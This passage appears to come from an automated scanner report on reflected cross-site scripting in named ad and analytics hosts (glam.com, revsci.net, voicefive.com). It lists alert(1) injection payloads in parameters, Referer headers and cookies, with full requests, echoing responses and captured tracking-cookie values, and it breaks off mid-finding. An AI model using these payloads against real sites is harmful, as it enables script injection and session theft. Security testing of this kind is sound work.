The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a10f'%3balert(1)//bca5408b201 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8a10f';alert(1)//bca5408b201 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /gad/glamadapt_jsrv.act?;flg=64;;zone=/;nt=b;cc=us;aft=p;ec=ron;p=0;p=1;!c=nae;!c=s;!c=sf;al=walmartdv;ec=tsp;ia=mf;jpbrash=admax;pec=sp;psh=y;rmt=exp;vec=sp;vpec=sp;ct=pacsun;ct=xboxk3905;atf=0;pfl=3;dt=s;!c=hagl;!c=hagn;pt=0;afid=1000212071;dsid=864279;pt=sk;gsz=888x11:999,300x250:1;uv=10;;tt=j;u=b0021fawbst1ssbzd4i,f0f02sa,g10001s;sz=300x250;tile=1;ord=4876240110024810;;afid=1000212071;dsid=864279;url=txanco;seq=1;ux=f-f02sa,tid-1,pid-fawbst1ssbzd4i,aid-2,g-64,1,;_glt=300:1:6:2:1:979:2011:6:13;a_tz=-300;_g_cv=2;&8a10f'%3balert(1)//bca5408b201=1 HTTP/1.1
Host: www35.glam.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: glam_sid=115232130551023312111; ctags=%3bct%3dpacsun%3bct%3dxboxk3905; bkpix2=1

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/x-javascript
ETag: "d398cadfb255eaeb5658516ed12d9db3:1307759730"
X-Glam-Bdata: XGlamBData,nbt,ls,rs
X-Glam-AdId: 5000045035
X-Glam-Euid: 5a74f4a2e4f82ff2cf7ca512fb18ddf9
X-Powered-By: GlamAdapt/ASE/1.5
Vary: Accept-Encoding
Expires: Mon, 13 Jun 2011 11:02:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:02:19 GMT
Content-Length: 3378
Connection: close

...[SNIP]...
f0f02sa,g10001s;sz=300x250;tile=1;ord=4876240110024810;;afid=1000212071;dsid=864279;url=txanco;seq=1;ux=f-f02sa,tid-1,pid-fawbst1ssbzd4i,aid-2,g-64,1,;_glt=300:1:6:2:1:979:2011:6:13;a_tz=-300;_g_cv=2;;8a10f';alert(1)//bca5408b201=1;';
var vars = glam_affiliate_vars.split(";");
for (var i=0;i<vars.length;i++) {
var pair = vars[i].split("=");
if ( pair[1] ) { glam_info[pair[0]] = pair[1]; }
}
return ( glam_info[pNa
...[SNIP]...

4.259. http://adnxs.revsci.net/imp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://adnxs.revsci.net
Path:	/imp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bac58'-alert(1)-'754f9cc0bfb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /imp?Z=728x90&s=748066&r=1&_salt=1188639314&u=http%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3Fc03b0%2522-alert%28document.cookie%29-%25225958ea17fd2%3D1 HTTP/1.1
Host: adnxs.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=bac58'-alert(1)-'754f9cc0bfb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e047724&2&10055,10194&4dde515c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e11aa0e&9&10133,10640,10654,10670,10448,10450,10451,10452,10454&4dec54ae&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzUJZjpr3tvXN1o+eD1xyIxlcCzatusCBJfE++0lLQNuuXZ5CT4uCSvFPNQT0hWbCTwwMzUmQfYqdTBpI9P3N3q3chR3MaWlhMjJbUeocpd1O8Sgep+oaO+IjRgHcIUICJud0O7fqoub6TzalGXqnPwzJJ5UHJSv8ywcjnyWu9H1Wcq4/KgDP73Tkh6HLB0Z+W9dmaFbUDYEXkJJpS/iw75tOwTfW/giI2GJS9b7su1iFqfUhySYGYOfDr66p86QMf+3SfQ4fFb2Vu95sP8xVU7ZWYkqKbJ9lF5lwMZv0GFqT5FCANCoeasHEnwpVDhWPUUcyw3O+p/f6CtRpHq1uaDk8uR9A28Y/odkGciZh7BdP3QWkgS+R03ooqkAF8AQoY9798jZhSIyqMD+O6SUZzfQ8eOLFZ4AAD7HeRUnfiI8B1nXx1a5s7qlk7ClFgGL2Yq7H7+N2D4YiJprcBFz5fA7pP+kSJKLeO3W8jV+fLTzCGfRdkSjdf+RWEeCttzckiQvPAoC2QhDMQw0hXnRHTB1GmUyO5yjJA5BVOpdLjeZlZwv21g6KJUaXcSZIErbyiyEwjw62RnxdA7s/LzMfqxtu4aRGWXeXeTN5OLXSeLoL4b0+E4Zqi+3KFQa+kqdtj1O/Uc65tiz3oFHjnL7uM6b29XqgW36mdYJf89adJmpDywmcjAenBlttURV48nlyj2WhrDe7c3RTF71orGDwSGXQ9ITD2bLusjZmZ8DVXaVqq8gjQtB3Q0tNCzKXlHMC+WEOt0dZQQopNKg6tTWp2tcfg7djY9ScV1IlU6jHxtcmrfslpsawJMcFf4ejv0FxL7++UYuwpCrJAA70ropBNG81+SSRZaybc9VhfBssPc+Uu83WpqpFIyXGeCiRALOBfO1MBfVx01dJ/8xWrxsW6Kt3RCLNThehKTDVQoystHiA8DJ8JGsLNtM5T9kglABxc5q/C2SPQ0kzenYBk5z5hLecLP7BjpFppgUel3sfsVRC7axsMKyHU1L5SJQl7sneRxqKD1D7QAD3l8/OI/HyLQplLYh7pBm6nY2agtV9iM77mVnunJgFn0HrAzbZiMiqzgZYd3bJIvLOP1L3enggvJ1ySeUuoLsryCTCPGMmqUDWMQDuweD2bB/NCNIVYfDeg4Kbe3Ayl9sO7yfCGCMrq6gCTS7UirE/q3nlAA/GE3bxaDPhYPM192eTUaVBICJ0uyCPqidVm3spNzLnL1Xo4EVjkyNS/1FuCBooatVAkJSCkzrrdaSRucVP+4VvJLQFozrH9YXuIiN/MhejzIDoYuHEut5UjNuNGmteXVgVnT2HjB7TwKoS0Sr5NZzwuaYNN8/vkn79fazjkOovj02xfsuxH3hqE6sFAf8+NAXhY/UdyNW6HxTy8saA/jFzKuB5qb/kJmUEaAg/EIRLhBAfG6CbK8KNbLrIchGA1fYfUDeKEO5dw/0I7pV1rIoGkXPD+j1p7I7FUeNEdZ3O1ad/7JzNMKkzuVXQVkVYQfnrJK5LfJ1qkGgL3jQldlBDiEGo/Fhn/Zxvscjh42kHH1J4nAyN6jZTRKv9Tz6Fuv56uSvHIiqOwgFoTGhEzt1k0ZHfM/5MO4sDbKMniVh+BbO8KpbZaTqsTNklzTkHPYdFWnA1/Imf2J7oiHp8nq7IWdDJ9IgiUWYNMRUJk76JvRI68ooK5NdD/t9uk3T01csXkVupfPIHpU0pVUKXch7fKhaanmX9RrTHO1KK8l/H/IK8VLviuOjDLQyTBR5r/rFnaqw31EU1wt7AqzRQv0MtLt5AhBy10UG7hHJ/582xNFtZVdIzV3+sMUymXk+e7aW; rsi_segs_1000000=pUPF5E+huQIMpzaxu2F29/z47hsEuy70RDTXd+G914J5660Uet4p7ETo+SWdpq+vjO9FyOb/GDElu8b1fCaRSIFw62TMPNHPf1Uqx8gUmMOMvyrrcedIMSklF2GlAYMSmIrtIJZyfP4Pyydb8gGQEEVPTWfUru16M3wgUTloRa1DGnHu9DnMc1auc8rlJvnrDyarDpRAiyIQYfRUCqgexMmvNfqE58La5XcyKE+kxELSBAa1/zYpbUyjmtOB0OtvZe/sCmSBGoAR5kOdyqrD2IhtKDv6Hm7ELwKhW1/80SlfI4rFnrJLbX7UnZAInsxa5gAJo4kYyL9wP83gjFu21v+Ljbe4JXONNcHEu0Gce1eCZSt7gMMJj5hcBujncOuzwe6JValzqkoUzG3Z4l7x9W4n035r+Thm+1dBZiGPuPRK62f5dqbS5k+dfOEB2C4Ac8yHd6NRXOls5lzqtCiPtU3yh7HMbMC7FKV4ntBCpgQuJVZdV4gB5DHvE8DJH5mJADuT5I9HoKBabFdqyGaatksuvficHH6shBTimFXWQqrZvS0wJISpelTmvT6MMLL6uX+IxeAKTal7iL3J/Ugmq+Y=; rtc_uJev=MLv/+QUJZjpn51IpAxjOavnaN4hKHsFKsArs1un9DiMi54ZO4wU4y0HsTfVxQcrrHSlE5FfEOUQroSDJyCQsxdLt7/+VDDyQPWRIX0xytnLBcQo53lKbEFpO3wIAuZz8HZvTV4jq26xTQlJbMB51kHXRMAfIYvU73OSE4v31+q1AsUQlmSW4MDxsUSl5syf9EAwGgMz8aTvWQss79Aoznerv/oPoLcS3IZ+nWYWt+OUqy+XB+Z60V8o7HQEhaE3h69iJIn8VtBpn+JyggNrNZP6VE97ADibCZgnznBHV4DQAPlI5qn054L4TEnkAg74ZDWQcD2+RFoWZBsYuvxEiPGirR+WcagTHF5VLx+nbqzqWKSXuZznwqyEnYlBZlUSMiSfGOoGVGMZlj87aQGSBYaESVnBO1uZ+YvFCIZJaEs5noLzF9OvdIjFsqjm2CXCcjyBP0B3WamO/GKhCvFjJwLorslmR8lc1xhZEq2W9AThoxiDM2IPsMHPt00376pU9pxVxN4J4i7BaEsFj71txvTn8wxVHX2mJYKppvllHdj4p/TXP8vuko61EuIhnljjwr+r2y/QmWzZfKqIejE1/03rU76tNeFBRDWR8aOyipbeh+uyTUpNI4F5CYz7Gvx2cycfmR+h+2FFCiEnrGz5xIiEZe+vlbLuOP1Teb0Mm5AoWhxh5E4NHL8ip21OpNqRAst/Owp+rabyr+y/wSDSU+PgbsrPOrZuP5DdctZS2vZ31/BspFFynU0vInbd6C8M41e7tObXyHbSc6JY6oL+ry8yJypsCxvlch7UL9bFNYKo3QoHT/b0K24rjLq7b5CyoVKlSHFsYW/nT1UbxVRlK9xjsUKgOW8+WD7LLJ9aLBOSXxXEa2gDU+FShT/yVZ5ST8Gz7fXtIczqrXFvAz8gojNIMCeZLGGJGSr78JZ9B5hC0PJWZsjLvZEMR9emYXBe71pQr3U5g6O2gnG1Q1x4RFm1ZsuLTctS2Np44xP9z1I01uEqcYVAaRagWGq3VZfYeqkuoIKPi9MID+Ndo1pamWoRhdiBEgrN8lO7+XLOBqApQ7zAcuZmjE79m8JfUvicISIu1O2QI93UXBytj5kmlaOEzXPGeEPnLopVuqvJFT7XOoD95J4ws49PwJ+b41WcNJEVpXCnmGfcw8Ej5o/D5gQrEGOQbM2/Di7zsqPFXCk86l8pOcnoG0KnNkQOrdlhL0nMtTPxLFVJrxsWl2mdpxlk1grOkmm7m55QD6zgCVxLlBr5W8BY3nx8MiGYxs6KwwKe9uC+UDtslJGuHjK3vuQ5LI5FUjgWFctA6iJzjR0icFenZZ//wsVxgnH/AWVfu6vF+4a3RpKHlQXo/pra89IahUKf47qaLJWe+MNyvehXi5zuM84yZ4jFAGTkXh3HNCMYB16La9jg3t61HuYu2OIPNgP2I6I8tKA/ddo95qmopGg1jO43mLmFxgw4jb3T5pohnBBGs9+VPqCDIH6fSfj4KT+Rq+SNTGT7GfVEEKjwlKoNUNuIfawbdFDh6vB1VD0LW3DoOKTu7bNZ0zmnOWEjGMwebwQJRel1UTreh58fk0xF4gmP2UyeCCLNFcjK1vTciJUUwxoD2b2Y4enJAjiKy+KHl4t4BEUiBU+PwDLGt2Yc2brjSeJv7T6uHZrAsKqTRn48kG3AJXwOH7Mx7OE1yp1NoSHAyf22LDiTxLdP56pliRIjXpaTOT5ht8EbsH2uvTGXedE4iACnn7pwC9AMI6JByiXZotWH9gO8HP2GMoEiL7+6BashzcvvO7rt5EFMabkI7WKoriB99Ei88GODv6SqOupixyBnZfVB7fNZcbPD6+XNkGjE+ne6rklaCQhg9HcHbo1AwbkR1b2wnnWzwGOlASKP3Qbsj33yIssJxC7LvmxZt5+feLVUlKnJpEHVToa0wnWJ5hbBK; rsiPus_xAcs="MLsXtaEubzhnJ5H4uuj6RIn8xZaw1LAEWBmSre0b4sZdUBIO9/+QaGI8haJsP3JhILgZSp1My4GE6Vb9IpffwRghX2HMhg6NO7oSGPPBHeXbeyZm2kCVYlCpZS666NLUrxjYRtHTnRwjNNGLfBGE8mdTT5t2SfkCbcVNn+zbT9uT15r8g0GSlaiFHwm+Ot/unzv9nPq58USCe3gS0fSsxfDOHyxulhvlMrdS42lagneTgNefoyzO0Fr2JIawRqNiXmmjNVMaJrQ1ZebW93nsjuUtro4XGLLPx7UbdM1cBSapwRRFyCOwQBodwvoyty+CF6vPgc6cYlkN6Cy64hMRC9hsQRveOWunCxMPo/izJXSIvFy3gMegP2rBVtZAjZKDIklIlGBrwJUpCXAY36fJpBu5KANXZzhYuER4xlMs5f+86QOizootJtPFYTjHIkhYyKhGRerRFol9gBfX4W2raZpGSMlmWoQ6nfIv9Gq8xevtqGoZ0nxQjefIO3AaW6RL8MKFMWgV3PqSKP5I7CJUDZzva1lTOCc/qvx4i7drcIQD/VG29AHLJC6LfXXfH8+0I75aQ2HfJMsGyEIbhDO3gqihSv7TZr1+nxKA5RSJJZ+VW2m2CLV9lKTjaEgLm8t0HRKpe8ZXjM9tjUWXWLGUB91sPhCuLXXHj2cwuVZUpf32b2jtSGxvz0TpJE6/Ws022v0SeJwsjY8mW93jYVy3iQbPjblWZg6RvogvuOb47Qe+Xj3LOeZ+B4qDRWKFealchpK6jZiGj9D1Yh+LHYAc1gcRHESco8BF5keg+yg+pVK3FfhPD6cKZDz81+1wIEZE2PxIU1lBWEYQgLNAqmP3/Vq0OCffM8IWMvC/g3VLB0DK9hAderMags/QWdobxRmgLQlJd+JqBVxi40QiZjE+EU3FGvGbfGrxOsO55UEea8jQBF4NtHpI12UCMQddc07iU4MNon1s1rx4VHZ6077sV40OhnEkSUkc1XcErSvSjr8seEo+BluAUP9iIQ4pBeJcvJ5w3LM18cdgO7EOb3ER+XOhPpGuh5y3p/icgg6SARMfX8BSH+9rfz9+d/9O6aW/8Unc/CDA30Y4TrbhIzCQOgZOMAcGskEjrD1jQuY89fmVuZt5Bk/qpIe5QLvSLRQRsySc30WZZQmH7LMyZgU3S3lapQXhmx80Dtwoq6CM8uwdMDAAAX7UXvJrjMxI598OVZBrasGtiQ=="; rsi_us_1000000="pUNdIy9H8BcU1P0/aqfkn2N1Ap5g5xkLPVaivNiRJr2tZwMLeGNala4ID3nHh2cF+Gsw6USDHERTcAJfp3cNryuAzA6SuOiGdFIutB3dZ/T8x+dO+hmlVHb2yh4tEImGScOe3p8MWsj5ypTMUnI9ferMTyksjj76yG7Nk9kokeO8VL96ii3fLPe0QzjfHxSBWWq75UtXJnuMjB9bcIMAkB9UJAJ/S0rx23QzCAKU6C6rCTVhVVitZTOtAQ1ZE50PI7pYdqvGjhKw1/Je5vobciGwlQ5pVOxqQ9Dv7SaM7WEls1mZTePd7ngyzvUJcmwECsNi6Zhc2zDC8vsxy0J7nsGy4bmsxLaIX0PaZQEg3zsI1ME8qKu7NfG4v0UZaMbda/KwX5lbp7msmVxxYLXzPPG+BnKMPZHi9AP8Xs1twIoyWMH5UfZuMQrUP4YPcUTIXaBTLxacRWz5EwOKHJvsoL0UTKdMOtMz/101b/i8yWhdmb3p0yxUobDJzhzavxOdQQ9pGEJBNZRxzyG7i/2vacfZgFohS2v1gU5/1zcVmUhR+bRSIV5j28JfNkiSM65QfllM+5uq+aAuswZ7NlJNhQJrDcqWF6Wue71GyH8mfVc3XZy2TM8WwMIobcVwHd2z/YnWx3X9pKO+Qh4K10O3s23QZybm2oQ/sBScd+h9F0DZN7jluQS4DDxBM05Ml2p++zvjCpfGffgNZeWZfzFmgLD1cDR37EhDrC6gtt1hR4XCuKcIIJJlAaoy7sn2KH5gZ0uQbcbiXgOInGkS/rGfKXxO651CjNZI5V0ukm6x2wQagjxGgNDmViTLvY6N12Krh3sGelYntEM/NEi15rnx8Cg/Y7f7so8cWtv5AO098HZPvOQL1Q58I+qK7zNdOi57osoHpl2Vju55Suq1RXqyiZFPlRdTs/9Rckn0c9+0e4ICEwVykHjhrZfsFft6QYinBMX0RIGssmU+nPJld/96oOkeJL4/vrVL5e+Qa+hvscGITKwHDfJz+rLp/y63sz018w67p7Js5W0hn9TJ9uN//OgZp8YOY9xPoRPtPHS0xaldxvNbtj9iAAD2tPLBEK/rPeGqJh8KqPc5IuceiV5Xld8ORV+3QsyW0tgMdLEi/zNoTVMVQZaKVtefr/qdzVYlw0Qou9+RYrGWsUkKFw1L0ITk90I8MmkxD1dP9G2ypeedlQ2UWOpPNEllJSEN/qEl7jFbd/fIFwGkQKNnUhAxGVZUPX96qEhkS8IphDNvxP9sdvJdXeGkAsZ5W3O0IFjQebtKipu6pusUtddKXkQtb4+eXKtJOwy5tlxHKUgqOkv8uAZL5zS7Au8uTZhWhDSqHn4PyIxIbyh6NLaHdj1I/bEiqmdUropmocRRVmGCCJjD4luuLweguSW+SMCyLpZ06GwvOz2PPULSfSgYsOQShUytccaYUQXE89am8h8QuDTHIlSkKjlJcsN+M/QxFbQkaiqnvZOZ/9EKFg/gp+H1ZzVZIRIIO7bxESvpoZL5YsHSdUc7Vk74RKXe+iK+kCD0eXKa6s1RLgkSLyczMUCr1ccOMBIwvnQRwtKR+dTUqDR4ysAwAJVJ/RFrcD08JJFG5WItAVI="

Response

4.260. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload c2891<script>alert(1)</script>c1f10d2f237 was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97464717&PRAd=1468426&AR_C=150255 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.tvfanatic.com/favicon.ico7a1b0%22%3e%3cscript%3ealert(%22FAVICON%22)%3c/script%3e15dca0967be/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; BMX_BR=pid=p20101109&prad=11794&arc=15313&exp=1307963601; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; BMX_3PC=1c2891<script>alert(1)</script>c1f10d2f237; UID=4a757a7-24.143.206.42-1305663172; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1307963602%2E056%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 11:27:43 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97464717=exp=2&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:27:43 2011&prad=1468426&arc=150255&; expires=Sun 11-Sep-2011 11:27:43 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 30495

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1468426",Pid:"p97464717",Arc:"150255",Location:COMSC
...[SNIP]...
"ar_p56282763": 'exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&', "UID": '4a757a7-24.143.206.42-1305663172', "BMX_3PC": '1c2891<script>alert(1)</script>c1f10d2f237', "ar_p101945457": 'exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&', "BMX_BR": 'pid=p20101109&prad=11794&arc=15313&exp=1307963601', "ar_p91143664
...[SNIP]...

4.261. http://ar.voicefive.com/bmx3/broker.pli [BMX_BR cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the BMX_BR cookie is copied into the HTML document as plain text between tags. The payload a6411<script>alert(1)</script>f52ba64d4f4 was submitted in the BMX_BR cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97464717&PRAd=1468426&AR_C=150255 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.tvfanatic.com/favicon.ico7a1b0%22%3e%3cscript%3ealert(%22FAVICON%22)%3c/script%3e15dca0967be/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; BMX_BR=pid=p20101109&prad=11794&arc=15313&exp=1307963601a6411<script>alert(1)</script>f52ba64d4f4; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; BMX_3PC=1; UID=4a757a7-24.143.206.42-1305663172; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1307963602%2E056%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 11:27:42 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97464717=exp=2&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:27:42 2011&prad=1468426&arc=150255&; expires=Sun 11-Sep-2011 11:27:42 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 30495

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1468426",Pid:"p97464717",Arc:"150255",Location:COMSC
...[SNIP]...
', "BMX_3PC": '1', "ar_p101945457": 'exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&', "BMX_BR": 'pid=p20101109&prad=11794&arc=15313&exp=1307963601a6411<script>alert(1)</script>f52ba64d4f4', "ar_p91143664": 'exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&', "ar_p81479006": 'exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10
...[SNIP]...

4.262. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the BMX_G cookie is copied into the HTML document as plain text between tags. The payload 72a67<script>alert(1)</script>343b05d7516 was submitted in the BMX_G cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

